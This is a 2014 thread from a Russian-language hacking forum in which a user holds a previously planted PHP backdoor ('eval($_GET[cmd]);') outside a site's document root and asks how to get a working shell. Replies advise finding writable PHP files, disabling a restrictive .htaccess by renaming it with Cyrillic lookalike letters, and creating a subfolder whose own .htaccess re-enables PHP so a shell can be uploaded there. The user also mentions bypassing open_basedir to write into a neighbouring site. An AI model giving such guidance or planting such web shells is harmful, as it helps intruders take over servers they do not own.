Вернуться   RDot > Песочница/Sandbox > Оффтоп/Offtopic

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
Старый 23.07.2014, 17:49   #1
dmx
 
Регистрация: 10.09.2012
Сообщений: 0
Репутация: 0
По умолчанию Бэкдор в не в директории рут сайта (( Можно что придумать, или не реально ?

вот ситуация:
в директории домен site.com и директория version
в директории version директории v1 и v2
у site.com документ рут /var/www/version/v2/
а в v1 залит бэкдор 1.php eval($_GET[cmd]);

реально как то из этого шелл получить. в site.com все папки закрыты на запись, кроме одной /img/ с htaccess
RemoveType .php
php_flag engine 0


Буду благодарен за ответ
dmx вне форума   Ответить с цитированием
Старый 23.07.2014, 19:49   #2
che
 
Аватар для che
 
Регистрация: 05.07.2010
Сообщений: 144
Репутация: 166
По умолчанию

ищи пхп файлы доступные на запись, не используй eval и в особенности GET
che вне форума   Ответить с цитированием
Старый 25.07.2014, 12:37   #3
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Переименую htaccess в htaccess с русскими буквами, таким образом с виду файл не изменится но выполнять свою функцию не будет, что позволит тебе хранить в данной папке шелл.
b3 вне форума   Ответить с цитированием
Старый 25.07.2014, 13:06   #4
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Не совсем понятно условие.
Что ли
/var/www/version/v1/ - один сайт
/var/www/version/v2/ - второй сайт
минишелл на первом сайте, а залить нужно на второй в img ?

Тогда пробуй создать подкаталог в img (img/bla/), в нем создай .htaccess, в котором разреши выполнение php.
В img/bla лей шелл.
Заходи на шелл через второй сайт, возможно права на запись станут другими, зальешься в более подходящее место.
nikp вне форума   Ответить с цитированием
Старый 26.07.2014, 15:59   #5
dmx
 
Регистрация: 10.09.2012
Сообщений: 0
Репутация: 0
По умолчанию

Цитата:
Сообщение от nikp Посмотреть сообщение
Не совсем понятно условие.
Что ли
/var/www/version/v1/ - один сайт
/var/www/version/v2/ - второй сайт
минишелл на первом сайте, а залить нужно на второй в img ?

Тогда пробуй создать подкаталог в img (img/bla/), в нем создай .htaccess, в котором разреши выполнение php.
В img/bla лей шелл.
Заходи на шелл через второй сайт, возможно права на запись станут другими, зальешься в более подходящее место.
нет вторго домена. только 1 . у него директория /var/www/version/v1/


не получится создать - я к соседу в обход open base dir - произвольный файл могу только создать. а там htaccess
что то слышал, что можно обернуть htaccess - но пока не получается.

Последний раз редактировалось dmx; 26.07.2014 в 16:06..
dmx вне форума   Ответить с цитированием
Старый 26.07.2014, 15:56   #6
dmx
 
Регистрация: 10.09.2012
Сообщений: 0
Репутация: 0
По умолчанию

Цитата:
Сообщение от b3 Посмотреть сообщение
Переименую htaccess в htaccess с русскими буквами, таким образом с виду файл не изменится но выполнять свою функцию не будет, что позволит тебе хранить в данной папке шелл.
у меня нет доступа. бэкдор был залит ранее сейчас он оказался вне диретории рут.
dmx вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра
Комбинированный вид Комбинированный вид

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot